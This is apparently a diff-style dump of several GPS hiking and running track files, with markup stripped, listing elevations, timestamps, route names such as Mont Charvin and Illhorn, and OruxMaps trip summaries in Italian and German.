+Minschuns1
+
+
+Minschuns1_0
+
+
+Minschuns1_1
+
+
+Minschuns1_2
+
+
+Minschuns1_3
+
+
+Minschuns1_4
+
+
+Minschuns1_5
+
+
+Minschuns1_6
+
+
+Minschuns1_7
+
+
+Minschuns1_8
+
+
+Minschuns1_9
+
+
+Minschuns1_10
+
+
+Minschuns1_11
+
+
+Minschuns1_12
+
+
+Minschuns1_13
+
+
+Minschuns1_14
+
+
+Minschuns1_15
+
+
+Minschuns1_16
+
+
+Minschuns1_17
+
+
+Minschuns1_18
+
+
+Minschuns1_19
+
+
+Minschuns1_20
+
+
+Minschuns1_21
+
+
+Minschuns1_22
+
+
+Minschuns1_23
+
+
+Minschuns1_24
+
+
+Minschuns1_25
+
+
+Minschuns1_26
+
+
+Minschuns1_27
+
+
+Minschuns1_28
+
+
+Minschuns1_29
+
+
+Minschuns1_30
+
+
+Minschuns1_31
+
+
+Minschuns1_32
+
+
+Minschuns1_33
+
+
+Minschuns1_34
+
+
+Minschuns1_35
+
+
+Minschuns1_36
+
+
+Minschuns1_37
+
+
+Minschuns1_38
+
+
+Minschuns1_39
+
+
+Minschuns1_40
+
+
+Minschuns1_41
+
+
+Minschuns1_42
+
+
+Minschuns1_43
+
+
+Minschuns1_44
+
+
+Minschuns1_45
+
+
+Minschuns1_46
+
+
+Minschuns1_47
+
+
+Minschuns1_48
+
+
+Minschuns1_49
+
+
+Minschuns1_50
+
+
+Minschuns1_51
+
+
+Minschuns1_52
+
+
+Minschuns1_53
+
+
+Minschuns1_54
+
+
+Minschuns1_55
+
+
+Minschuns1_56
+
+
+Minschuns1_57
+
+
+Minschuns1_58
+
+
+Minschuns1_59
+
+
+Minschuns1_60
+
+
+Minschuns1_61
+
+
+Minschuns1_62
+
+
+Minschuns1_63
+
+
+Minschuns1_64
+
+
+Minschuns1_65
+
+
+Minschuns1_66
+
+
+Minschuns1_67
+
+
+Minschuns1_68
+ "
+"
+
+
+
+
+
+
+Garmin Connect
+2016-07-30T06:23:35Z
+
+Zustieg Guferstock
+
+hiking
+
+
+2129.199951171875
+2016-07-30T06:23:35Z
+
+
+
+
+
+2132.39990234375
+2016-07-30T06:24:43Z
+
+
+
+
+
+2138.0
+2016-07-30T06:25:22Z
+
+
+
+
+
+2144.39990234375
+2016-07-30T06:26:17Z
+
+
+
+
+
+2154.39990234375
+2016-07-30T06:27:20Z
+
+
+
+
+
+2180.60009765625
+2016-07-30T06:30:40Z
+
+
+
+
+
+2188.0
+2016-07-30T06:31:34Z
+
+
+
+
+
+2204.39990234375
+2016-07-30T06:33:30Z
+
+
+
+
+
+2213.199951171875
+2016-07-30T06:35:27Z
+
+
+
+
+
+2217.39990234375
+2016-07-30T06:35:55Z
+
+
+
+
+
+2227.39990234375
+2016-07-30T06:36:56Z
+
+
+
+
+
+2236.0
+2016-07-30T06:37:58Z
+
+
+
+
+
+2241.60009765625
+2016-07-30T06:38:38Z
+
+
+
+
+
+2243.60009765625
+2016-07-30T06:38:54Z
+
+
+
+
+
+2253.39990234375
+2016-07-30T06:40:18Z
+
+
+
+
+
+2268.60009765625
+2016-07-30T06:42:14Z
+
+
+
+
+
+2281.39990234375
+2016-07-30T06:43:45Z
+
+
+
+
+
+2302.60009765625
+2016-07-30T06:49:18Z
+
+
+
+
+
+2323.39990234375
+2016-07-30T06:51:31Z
+
+
+
+
+
+2348.60009765625
+2016-07-30T06:55:13Z
+
+
+
+
+
+2344.39990234375
+2016-07-30T06:59:30Z
+
+
+
+
+
+2344.39990234375
+2016-07-30T06:59:50Z
+
+
+
+
+
+2347.60009765625
+2016-07-30T07:00:38Z
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin Connect
+2015-08-21T06:51:07Z
+
+Punta Giordani & Corno del Camoscio 21. / 22.08.2015 - I -
+
+
+
+2971.39990234375
+2015-08-21T06:51:07Z
+
+
+2977.199951171875
+2015-08-21T06:55:07Z
+
+
+2942.60009765625
+2015-08-21T06:57:07Z
+
+
+2937.60009765625
+2015-08-21T06:58:07Z
+
+
+2936.60009765625
+2015-08-21T06:59:37Z
+
+
+2945.0
+2015-08-21T07:02:07Z
+
+
+2947.800048828125
+2015-08-21T07:03:07Z
+
+
+2983.199951171875
+2015-08-21T07:08:07Z
+
+
+2998.199951171875
+2015-08-21T07:09:37Z
+
+
+2968.39990234375
+2015-08-21T07:11:37Z
+
+
+3001.800048828125
+2015-08-21T07:15:37Z
+
+
+3002.199951171875
+2015-08-21T07:17:37Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+
+
+
+
+656.400024414062
+2015-05-31T05:11:45Z
+
+
+659.200012207031
+2015-05-31T05:14:32Z
+
+
+659.200012207031
+2015-05-31T05:14:42Z
+
+
+663.400024414062
+2015-05-31T05:15:14Z
+
+
+667.599975585938
+2015-05-31T05:15:55Z
+
+
+669.599975585938
+2015-05-31T05:16:27Z
+
+
+671.599975585938
+2015-05-31T05:16:42Z
+
+
+676.599975585938
+2015-05-31T05:17:22Z
+
+
+678.200012207031
+2015-05-31T05:17:44Z
+
+
+678.200012207031
+2015-05-31T05:18:16Z
+
+
+681.200012207031
+2015-05-31T05:18:39Z
+
+
+683.400024414062
+2015-05-31T05:19:08Z
+
+
+687.400024414062
+2015-05-31T05:19:29Z
+
+
+689.799987792969
+2015-05-31T05:19:53Z
+
+
+694.200012207031
+2015-05-31T05:20:14Z
+
+
+700.400024414062
+2015-05-31T05:20:54Z
+
+
+705.599975585938
+2015-05-31T05:21:57Z
+
+
+710.599975585938
+2015-05-31T05:22:26Z
+
+
+712.599975585938
+2015-05-31T05:22:43Z
+
+
+713.799987792969
+2015-05-31T05:22:51Z
+
+
+717.200012207031
+2015-05-31T05:23:19Z
+
+
+725.400024414062
+2015-05-31T05:24:05Z
+
+
+731.200012207031
+2015-05-31T05:24:30Z
+
+
+731.599975585938
+2015-05-31T05:25:01Z
+
+
+733.400024414062
+2015-05-31T05:25:28Z
+
+
+733.400024414062
+2015-05-31T05:25:39Z
+
+
+739.599975585938
+2015-05-31T05:27:01Z
+
+
+743.799987792969
+2015-05-31T05:28:28Z
+
+
+746.0
+2015-05-31T05:28:48Z
+
+
+749.0
+2015-05-31T05:29:11Z
+
+
+752.200012207031
+2015-05-31T05:29:40Z
+
+
+756.599975585938
+2015-05-31T05:30:10Z
+
+
+761.0
+2015-05-31T05:30:43Z
+
+
+777.200012207031
+2015-05-31T05:32:09Z
+
+
+787.799987792969
+2015-05-31T05:33:30Z
+
+
+810.400024414062
+2015-05-31T05:36:21Z
+ "
+"
+
+
+2018.01.28 Carì
+
+
+
+
+
+
+
+
+
+1630.3000033694498
+
+
+1636.400065099151
+
+
+1643.6
+
+
+1643.5999982063524
+
+
+1644.200010627977
+
+
+1647.5569015864396
+
+
+1656.6999643087859
+
+
+1670.5
+
+
+1678.9000265642576
+
+
+1690.1
+
+
+1715.699980212622
+
+
+1723.8999758634952
+
+
+1739.1999745929438
+
+
+1742.400009588401
+
+
+1746.2
+
+
+1760.1666887286542
+
+
+1776.9
+
+
+1788.80001863191
+
+
+1795.5999994841382
+
+
+1815.8999365356303
+
+
+1846.4
+
+
+1863.4999379205913
+
+
+1870.2409298915097
+
+
+1897.5999151283813
+
+
+1919.8998357630308
+
+
+1928.6000059873218
+
+
+1938.10000881802
+
+
+1942.2023445552654
+
+
+1944.3200623809794
+
+
+1948.200026260243
+
+
+1949.8479789904309
+
+
+1951.0
+
+
+1955.8999830556004
+
+
+1953.7000223718712
+
+
+1949.5999905117833
+
+
+1942.0
+
+
+1942.2999964721218
+
+
+1941.6395061870714
+
+
+1934.100005898918
+
+
+1925.4999826045164
+
+
+1920.6128791935278
+
+
+1910.300143781563
+
+
+1848.3999634985632
+
+
+1845.2336299230526
+
+
+1841.0698169614623
+
+
+1838.2999892549528
+
+
+1829.4999768591579
+
+
+1822.2000084208476
+
+
+1815.0000101565377
+
+
+1817.699982263608
+
+
+1812.1000234215842
+
+
+1780.9000208054986
+
+
+1764.3000755896064
+
+
+1751.9999587802401
+
+
+1723.3999853507353
+
+
+1714.899949945837
+
+
+1684.2999672217504
+
+
+1675.5000168586444
+
+
+1664.3999607080104
+
+
+1652.6999481552225
+
+
+1644.3830965221337
+
+
+1640.6999975227957
+
+
+1639.3480581372235
+
+
+1623.4999896476527
+
+
+1628.300012055273
+
+
+1632.2999821296967
+
+
+1636.2000090486802
+
+
+1639.2999820604614
+
+
+1643.3000279503103
+
+
+1647.699996646298
+
+
+1647.5999990278497
+
+
+1647.8999928037529
+
+
+1648.7768243939054
+
+
+1646.6000024835569
+
+
+1643.3999991378407
+
+
+1638.500019978469
+
+
+1633.200007121892
+
+
+1630.3000033694498
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-08-04T10:18:58Z
+
+2015-08-04 12:18:19 Illhorn
+
+
+
+
+
+
+2474.46
+2015-08-04T08:01:23Z
+
+
+2486.41
+2015-08-04T08:03:36Z
+
+
+2496.57
+2015-08-04T08:06:15Z
+
+
+2525.33
+2015-08-04T08:12:14Z
+
+
+2531.1
+2015-08-04T08:14:20Z
+
+
+2542.12
+2015-08-04T08:17:07Z
+
+
+2549.38
+2015-08-04T08:22:38Z
+
+
+2557.59
+2015-08-04T08:24:04Z
+
+
+2578.14
+2015-08-04T08:27:41Z
+
+
+2602.71
+2015-08-04T08:32:06Z
+
+
+2612.18
+2015-08-04T08:33:44Z
+
+
+2653.99
+2015-08-04T08:38:52Z
+
+
+2663.46
+2015-08-04T08:40:04Z
+
+
+2693.54
+2015-08-04T08:44:24Z
+
+
+2702.9
+2015-08-04T08:45:21Z
+
+
+2704.95
+2015-08-04T09:18:08Z
+
+
+2701.13
+2015-08-04T09:41:41Z
+
+
+2696.65
+2015-08-04T09:43:02Z
+
+
+2679.13
+2015-08-04T09:45:07Z
+
+
+2668.44
+2015-08-04T09:46:15Z
+
+
+2664.11
+2015-08-04T09:46:41Z
+
+
+2658.83
+2015-08-04T09:47:24Z
+
+
+2642.47
+2015-08-04T09:49:32Z
+
+
+2635.81
+2015-08-04T09:50:17Z
+
+
+2627.67
+2015-08-04T09:51:03Z
+
+
+2620.24
+2015-08-04T09:52:07Z
+
+
+2603.14
+2015-08-04T09:53:38Z
+
+
+2575.84
+2015-08-04T09:56:46Z
+
+
+2554.23
+2015-08-04T09:59:29Z
+
+
+2546.94
+2015-08-04T10:02:35Z
+
+
+2539.8
+2015-08-04T10:06:49Z
+
+
+2529.9
+2015-08-04T10:09:13Z
+
+
+2523.26
+2015-08-04T10:10:56Z
+
+
+2514.33
+2015-08-04T10:12:54Z
+
+
+2505.71
+2015-08-04T10:14:08Z
+
+
+2495.95
+2015-08-04T10:15:38Z
+
+
+2477.25
+2015-08-04T10:17:07Z
+
+
+2469.08
+2015-08-04T10:17:48Z
+
+
+2466.57
+2015-08-04T10:18:08Z
+ "
+"
+
+
+2014-07-01 09:02
+
+
+
+
+
+OruxMaps
+2014-07-01T06:02:42Z
+
+
+2014-07-01 09:02
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Nome: 2014-07-01 09:02</h2><br /><p>Orario inizio: 07/01/2014 09:01</p><p>Orario fine: 07/01/2014 11:53</p><p>Distanza: 3,9 km (02:51)</p><p>Tempo movimento: 01:25</p><p>Media segmento attuale: 1,4 km/h</p><p>Media veloc. mov.: 2,8 km/h</p><p>Max. Velocità: 12,9 km/h</p><p>Altitudine minima: 1023 m</p><p>Altitudine massima: 1111 m</p><p>Velocità di salita: 67,5 m/h</p><p>Velocità di discesa: -112,2 m/h</p><p>Guadagno di elevazione: 102 m</p><p>Perdita di elevazione: -101 m</p><p>Tempo di salita: 01:31</p><p>Tempo di discesa: 00:54</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Non definito
+
+
+
+
+
+1037.17
+2014-07-01T06:01:30Z
+
+
+1035.31
+2014-07-01T06:06:30Z
+
+
+1035.22
+2014-07-01T06:07:43Z
+
+
+1036.91
+2014-07-01T06:09:34Z
+
+
+1038.49
+2014-07-01T06:10:44Z
+
+
+1040.05
+2014-07-01T06:12:46Z
+
+
+1044.76
+2014-07-01T06:14:24Z
+
+
+1043.76
+2014-07-01T06:16:06Z
+
+
+1047.56
+2014-07-01T06:16:55Z
+
+
+1046.71
+2014-07-01T06:17:34Z
+
+
+1047.91
+2014-07-01T06:21:50Z
+
+
+1052.61
+2014-07-01T06:24:41Z
+
+
+1057.62
+2014-07-01T06:25:43Z
+
+
+1061.82
+2014-07-01T06:27:13Z
+
+
+1064.19
+2014-07-01T06:31:03Z
+
+
+1076.85
+2014-07-01T06:34:39Z
+
+
+1083.51
+2014-07-01T06:36:23Z
+
+
+1085.6
+2014-07-01T06:38:04Z
+
+
+1095.01
+2014-07-01T06:44:36Z
+
+
+1099.89
+2014-07-01T06:48:04Z
+
+
+1102.37
+2014-07-01T06:49:58Z
+
+
+1109.63
+2014-07-01T06:58:17Z
+
+
+1109.78
+2014-07-01T07:01:45Z
+
+
+1106.62
+2014-07-01T07:02:49Z
+
+
+1098.0
+2014-07-01T07:06:22Z
+
+
+1095.02
+2014-07-01T07:07:58Z
+
+
+1101.83
+2014-07-01T07:14:22Z
+
+
+1098.28
+2014-07-01T07:15:16Z
+
+
+1096.32
+2014-07-01T07:15:44Z
+
+
+1091.18
+2014-07-01T07:18:13Z
+
+
+1088.12
+2014-07-01T07:18:53Z
+
+
+1085.38
+2014-07-01T07:19:43Z
+
+
+1075.52
+2014-07-01T07:21:06Z
+
+
+1092.6
+2014-07-01T07:28:15Z
+
+
+1094.75
+2014-07-01T07:31:15Z
+
+
+1095.73
+2014-07-01T07:32:06Z
+
+
+1090.1
+2014-07-01T07:33:06Z
+
+
+1104.86
+2014-07-01T07:37:39Z
+
+
+1101.74
+2014-07-01T08:01:55Z
+
+
+1078.23
+2014-07-01T08:06:55Z
+
+
+1078.36
+2014-07-01T08:07:50Z
+
+
+1078.92
+2014-07-01T08:08:49Z
+
+
+1087.84
+2014-07-01T08:09:40Z
+
+
+1081.2
+2014-07-01T08:10:59Z
+
+
+1073.02
+2014-07-01T08:12:18Z
+
+
+1070.63
+2014-07-01T08:13:22Z
+
+
+1071.89
+2014-07-01T08:14:49Z
+
+
+1059.75
+2014-07-01T08:17:39Z
+
+
+1054.27
+2014-07-01T08:18:26Z
+
+
+1059.3
+2014-07-01T08:20:32Z
+
+
+1058.88
+2014-07-01T08:30:28Z
+
+
+1059.33
+2014-07-01T08:30:45Z
+
+
+1057.93
+2014-07-01T08:33:39Z
+
+
+1050.73
+2014-07-01T08:34:36Z
+
+
+1041.56
+2014-07-01T08:35:14Z
+
+
+1023.14
+2014-07-01T08:38:40Z
+
+
+1043.65
+2014-07-01T08:43:02Z
+
+
+1042.52
+2014-07-01T08:44:14Z
+
+
+1041.01
+2014-07-01T08:47:39Z
+
+
+1039.7
+2014-07-01T08:49:12Z
+
+
+1036.22
+2014-07-01T08:53:20Z
+ "
+"
+
+
+
+
+
+
+
+
+
+
+704.599975585938
+2014-11-09T06:44:08Z
+
+
+704.799987792969
+2014-11-09T06:44:56Z
+
+
+704.799987792969
+2014-11-09T06:45:20Z
+
+
+711.799987792969
+2014-11-09T06:48:14Z
+
+
+721.400024414062
+2014-11-09T06:49:06Z
+
+
+733.599975585938
+2014-11-09T06:50:15Z
+
+
+737.200012207031
+2014-11-09T06:50:40Z
+
+
+744.799987792969
+2014-11-09T06:51:13Z
+
+
+749.400024414062
+2014-11-09T06:52:00Z
+
+
+758.799987792969
+2014-11-09T06:52:43Z
+
+
+765.599975585938
+2014-11-09T06:53:19Z
+
+
+774.799987792969
+2014-11-09T06:54:20Z
+
+
+787.799987792969
+2014-11-09T06:55:21Z
+
+
+809.0
+2014-11-09T06:57:14Z
+
+
+821.599975585938
+2014-11-09T06:58:24Z
+
+
+829.799987792969
+2014-11-09T06:59:01Z
+
+
+846.0
+2014-11-09T07:00:20Z
+
+
+869.200012207031
+2014-11-09T07:02:43Z
+
+
+875.0
+2014-11-09T07:04:54Z
+
+
+880.400024414062
+2014-11-09T07:06:29Z
+
+
+885.799987792969
+2014-11-09T07:07:24Z
+
+
+897.0
+2014-11-09T07:09:07Z
+
+
+914.599975585938
+2014-11-09T07:10:54Z
+
+
+925.400024414062
+2014-11-09T07:16:05Z
+
+
+929.599975585938
+2014-11-09T07:18:04Z
+
+
+930.400024414062
+2014-11-09T07:19:39Z
+
+
+929.400024414062
+2014-11-09T07:21:32Z
+
+
+914.0
+2014-11-09T07:23:35Z
+
+
+895.799987792969
+2014-11-09T07:25:06Z
+
+
+887.400024414062
+2014-11-09T07:26:02Z
+
+
+883.0
+2014-11-09T07:26:56Z
+
+
+879.0
+2014-11-09T07:27:57Z
+
+
+924.599975585938
+2014-11-09T07:32:16Z
+
+
+931.400024414062
+2014-11-09T07:32:46Z
+
+
+940.200012207031
+2014-11-09T07:33:25Z
+
+
+958.0
+2014-11-09T07:35:01Z
+
+
+987.400024414062
+2014-11-09T07:37:15Z
+
+
+991.799987792969
+2014-11-09T07:38:30Z
+
+
+1011.20001220703
+2014-11-09T07:40:20Z
+
+
+1026.19995117188
+2014-11-09T07:41:49Z
+
+
+1046.59997558594
+2014-11-09T07:43:31Z
+
+
+1066.19995117188
+2014-11-09T07:45:15Z
+
+
+1072.40002441406
+2014-11-09T07:45:50Z
+
+
+1098.59997558594
+2014-11-09T07:48:05Z
+
+
+1114.80004882812
+2014-11-09T07:49:18Z
+
+
+1126.40002441406
+2014-11-09T07:50:24Z
+
+
+1131.80004882812
+2014-11-09T07:50:46Z
+
+
+1132.19995117188
+2014-11-09T07:50:53Z
+
+
+1143.19995117188
+2014-11-09T07:51:51Z
+
+
+1151.40002441406
+2014-11-09T07:52:28Z
+
+
+1172.0
+2014-11-09T07:54:12Z
+
+
+1193.19995117188
+2014-11-09T07:55:52Z
+
+
+1203.0
+2014-11-09T07:56:44Z
+
+
+1225.59997558594
+2014-11-09T07:58:31Z
+
+
+1253.19995117188
+2014-11-09T08:00:52Z
+
+
+1288.40002441406
+2014-11-09T08:03:55Z
+
+
+1308.80004882812
+2014-11-09T08:05:43Z
+
+
+1330.80004882812
+2014-11-09T08:07:45Z
+
+
+1351.40002441406
+2014-11-09T08:10:43Z
+
+
+1358.40002441406
+2014-11-09T08:13:10Z
+
+
+1368.80004882812
+2014-11-09T08:14:23Z
+
+
+1379.40002441406
+2014-11-09T08:16:05Z
+
+
+1383.19995117188
+2014-11-09T08:16:43Z
+
+
+1385.19995117188
+2014-11-09T08:17:19Z
+
+
+1391.80004882812
+2014-11-09T08:17:51Z
+
+
+1402.59997558594
+2014-11-09T08:18:36Z
+
+
+1428.0
+2014-11-09T08:20:54Z
+
+
+1460.0
+2014-11-09T08:23:43Z
+
+
+1479.19995117188
+2014-11-09T08:27:09Z
+ "
+"
+
+
+Peynard
+
+
+
+
+
+OruxMaps
+2017-06-15T07:03:19Z
+
+
+Peynard
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Peynard</h2><br /><p>Startzeit: 06/15/2017 09:03</p><p>Zielzeit: 06/15/2017 10:51</p><p>Strecke: 3,9km (01:47)</p><p>Bewegungszeit: 01:26</p><p>Ø-Geschwindigkeit: 2,2km/h</p><p>Netto-Geschwindigkeit: 2,7km/h</p><p>Max. Geschwindigkeit: 7,7km/h</p><p>Minimale Höhe: 2100m</p><p>Maximale Höhe: 2782m</p><p>Steig-Geschw.: 486,9m/h</p><p>Sink-Geschw.: -498,1m/h</p><p>Aufstieg: 713m</p><p>Abstieg: -75m</p><p>Steigzeit: 01:27</p><p>Sinkzeit: 00:09</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+2114.88
+2017-06-15T07:03:19Z
+
+
+2107.34
+2017-06-15T07:04:02Z
+
+
+2105.42
+2017-06-15T07:04:18Z
+
+
+2103.42
+2017-06-15T07:06:01Z
+
+
+2113.3
+2017-06-15T07:07:59Z
+
+
+2121.29
+2017-06-15T07:08:47Z
+
+
+2124.52
+2017-06-15T07:10:41Z
+
+
+2136.36
+2017-06-15T07:12:30Z
+
+
+2142.39
+2017-06-15T07:12:52Z
+
+
+2140.43
+2017-06-15T07:13:22Z
+
+
+2145.29
+2017-06-15T07:14:21Z
+
+
+2155.43
+2017-06-15T07:16:40Z
+
+
+2154.85
+2017-06-15T07:17:26Z
+
+
+2166.31
+2017-06-15T07:18:55Z
+
+
+2160.99
+2017-06-15T07:19:34Z
+
+
+2158.92
+2017-06-15T07:20:22Z
+
+
+2161.27
+2017-06-15T07:21:23Z
+
+
+2161.17
+2017-06-15T07:22:43Z
+
+
+2171.8
+2017-06-15T07:25:11Z
+
+
+2187.11
+2017-06-15T07:27:07Z
+
+
+2203.34
+2017-06-15T07:28:51Z
+
+
+2218.92
+2017-06-15T07:30:51Z
+
+
+2225.91
+2017-06-15T07:32:28Z
+
+
+2239.76
+2017-06-15T07:35:47Z
+
+
+2243.35
+2017-06-15T07:36:14Z
+
+
+2273.16
+2017-06-15T07:38:59Z
+
+
+2281.8
+2017-06-15T07:39:49Z
+
+
+2309.89
+2017-06-15T07:43:40Z
+
+
+2322.42
+2017-06-15T07:46:50Z
+
+
+2340.85
+2017-06-15T07:47:50Z
+
+
+2342.55
+2017-06-15T07:50:23Z
+
+
+2378.27
+2017-06-15T07:54:48Z
+
+
+2407.05
+2017-06-15T07:58:40Z
+
+
+2425.92
+2017-06-15T08:01:48Z
+
+
+2495.95
+2017-06-15T08:09:49Z
+
+
+2519.45
+2017-06-15T08:14:43Z
+
+
+2590.68
+2017-06-15T08:22:31Z
+
+
+2636.91
+2017-06-15T08:32:12Z
+
+
+2694.42
+2017-06-15T08:38:49Z
+
+
+2694.48
+2017-06-15T08:39:02Z
+
+
+2714.93
+2017-06-15T08:40:58Z
+
+
+2745.92
+2017-06-15T08:45:54Z
+
+
+2772.42
+2017-06-15T08:48:57Z
+
+
+2782.85
+2017-06-15T08:51:15Z
+ "
+"
+
+
+Mont Charvin 2
+
+
+
+
+
+OruxMaps
+2016-06-23T08:58:46Z
+
+
+Mont Charvin 2
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Mont Charvin 2</h2><br /><p>Startzeit: 06/23/2016 10:58</p><p>Zielzeit: 06/23/2016 14:05</p><p>Strecke: 4,2km (03:06)</p><p>Bewegungszeit: 01:43</p><p>Ø-Geschwindigkeit: 1,3km/h</p><p>Netto-Geschwindigkeit: 2,4km/h</p><p>Max. Geschwindigkeit: 5,7km/h</p><p>Minimale Höhe: 1382m</p><p>Maximale Höhe: 2404m</p><p>Steig-Geschw.: 364,2m/h</p><p>Sink-Geschw.: -177,6m/h</p><p>Aufstieg: 1039m</p><p>Abstieg: -33m</p><p>Steigzeit: 02:51</p><p>Sinkzeit: 00:11</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1383.54
+2016-06-23T08:58:12Z
+
+
+1401.87
+2016-06-23T09:01:10Z
+
+
+1406.5
+2016-06-23T09:01:29Z
+
+
+1405.53
+2016-06-23T09:02:39Z
+
+
+1425.53
+2016-06-23T09:04:55Z
+
+
+1441.36
+2016-06-23T09:06:08Z
+
+
+1456.66
+2016-06-23T09:08:14Z
+
+
+1479.87
+2016-06-23T09:10:05Z
+
+
+1495.03
+2016-06-23T09:12:08Z
+
+
+1497.53
+2016-06-23T09:13:17Z
+
+
+1503.57
+2016-06-23T09:14:53Z
+
+
+1497.83
+2016-06-23T09:15:34Z
+
+
+1502.52
+2016-06-23T09:17:11Z
+
+
+1513.41
+2016-06-23T09:21:19Z
+
+
+1519.5
+2016-06-23T09:23:20Z
+
+
+1546.41
+2016-06-23T09:26:26Z
+
+
+1573.01
+2016-06-23T09:32:24Z
+
+
+1571.52
+2016-06-23T09:33:27Z
+
+
+1612.58
+2016-06-23T09:34:52Z
+
+
+1635.0
+2016-06-23T09:37:46Z
+
+
+1634.22
+2016-06-23T09:38:40Z
+
+
+1624.97
+2016-06-23T09:39:51Z
+
+
+1647.97
+2016-06-23T09:44:00Z
+
+
+1648.58
+2016-06-23T09:45:43Z
+
+
+1660.06
+2016-06-23T09:48:12Z
+
+
+1682.61
+2016-06-23T09:51:53Z
+
+
+1701.54
+2016-06-23T09:54:55Z
+
+
+1733.67
+2016-06-23T09:58:34Z
+
+
+1720.74
+2016-06-23T09:59:10Z
+
+
+1759.02
+2016-06-23T10:03:08Z
+
+
+1800.17
+2016-06-23T10:07:34Z
+
+
+1813.05
+2016-06-23T10:11:12Z
+
+
+1842.01
+2016-06-23T10:15:00Z
+
+
+1894.61
+2016-06-23T10:22:40Z
+
+
+1901.26
+2016-06-23T10:27:18Z
+
+
+1943.68
+2016-06-23T10:29:52Z
+
+
+1958.67
+2016-06-23T10:31:59Z
+
+
+1967.3
+2016-06-23T10:33:21Z
+
+
+2037.05
+2016-06-23T10:43:52Z
+
+
+2069.94
+2016-06-23T10:48:48Z
+
+
+2090.17
+2016-06-23T10:51:30Z
+
+
+2121.58
+2016-06-23T10:55:13Z
+
+
+2124.01
+2016-06-23T10:55:46Z
+
+
+2143.17
+2016-06-23T10:58:44Z
+
+
+2160.55
+2016-06-23T11:01:10Z
+
+
+2161.67
+2016-06-23T11:18:04Z
+
+
+2206.17
+2016-06-23T11:22:46Z
+
+
+2209.8
+2016-06-23T11:24:49Z
+
+
+2229.05
+2016-06-23T11:27:13Z
+
+
+2247.71
+2016-06-23T11:32:54Z
+
+
+2260.58
+2016-06-23T11:40:21Z
+
+
+2276.11
+2016-06-23T11:44:30Z
+
+
+2294.3
+2016-06-23T11:46:24Z
+
+
+2301.23
+2016-06-23T11:47:45Z
+
+
+2314.05
+2016-06-23T11:49:35Z
+
+
+2325.21
+2016-06-23T11:50:41Z
+
+
+2356.19
+2016-06-23T11:59:06Z
+
+
+2373.55
+2016-06-23T12:00:26Z
+
+
+2404.53
+2016-06-23T12:05:08Z
+ "
+"
+
+
+
+
+
+
+
+Monteisola
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+Tourenplanung am 19. Juli 2016
+
+TemporaryUserGroup
+
+
+
+2016-07-19T18:43:59Z
+
+Tourenplanung am 19. Juli 2016
+
+
+
+274.0803
+
+
+273.96248
+
+
+275.02036
+
+
+276.50307
+
+
+279.13203
+
+
+281.29765
+
+
+289.2514
+
+
+290.28987
+
+
+292.01086
+
+
+299.6246
+
+
+303.47313
+
+
+306.50167
+
+
+315.36989
+
+
+318.61601
+
+
+330.33855
+
+
+331.15808
+
+
+344.08984
+
+
+332.9599
+
+
+347.10901
+
+
+346.96902
+
+
+349.17028
+
+
+354.35412
+
+
+365.05109
+
+
+373.73432
+
+
+381.22984
+
+
+389.55064
+
+
+399.23864
+
+
+404.66542
+
+
+442.02096
+
+
+487.20418
+
+
+482.56154
+
+
+485.06784
+
+
+487.97454
+
+
+432.0886
+
+
+433.88989
+
+
+408.57674
+
+
+401.14286
+
+
+395.15264
+
+
+374.9761
+
+
+372.32898
+
+
+361.64565
+
+
+353.06953
+
+
+343.89527
+
+
+345.68922
+
+
+343.3982
+
+
+333.12188
+
+
+332.65788
+
+
+324.62389
+
+
+317.94517
+
+
+311.56691
+
+
+309.85327
+
+
+309.19159
+
+
+293.87302
+
+
+291.54738
+
+
+285.21438
+
+
+283.62952
+
+
+283.13025
+
+
+285.38479
+
+
+285.10594
+
+
+283.24214
+
+
+281.10348
+
+
+273.11135
+
+
+273.76069
+
+
+276.93907
+
+
+278.1796
+
+
+274.0
+ "
+"
+
+
+
+
+
+
+Garmin Connect
+2017-08-14T13:01:36Z
+
+Dranse (Liddes) Corsa
+
+running
+
+
+1332.4000244140625
+2017-08-14T13:01:36Z
+
+
+
+
+1329.0
+2017-08-14T13:02:34Z
+
+
+
+
+1325.4000244140625
+2017-08-14T13:03:10Z
+
+
+
+
+1319.4000244140625
+2017-08-14T13:04:05Z
+
+
+
+
+1312.199951171875
+2017-08-14T13:05:07Z
+
+
+
+
+1292.4000244140625
+2017-08-14T13:06:03Z
+
+
+
+
+1276.4000244140625
+2017-08-14T13:07:08Z
+
+
+
+
+1271.800048828125
+2017-08-14T13:07:55Z
+
+
+
+
+1273.199951171875
+2017-08-14T13:09:17Z
+
+
+
+
+1274.800048828125
+2017-08-14T13:09:58Z
+
+
+
+
+1280.199951171875
+2017-08-14T13:11:00Z
+
+
+
+
+1294.800048828125
+2017-08-14T13:12:40Z
+
+
+
+
+1333.5999755859375
+2017-08-14T13:17:50Z
+
+
+
+
+1336.4000244140625
+2017-08-14T13:18:14Z
+
+
+
+
+1357.4000244140625
+2017-08-14T13:20:41Z
+
+
+
+
+1382.5999755859375
+2017-08-14T13:24:13Z
+
+
+
+
+1413.0
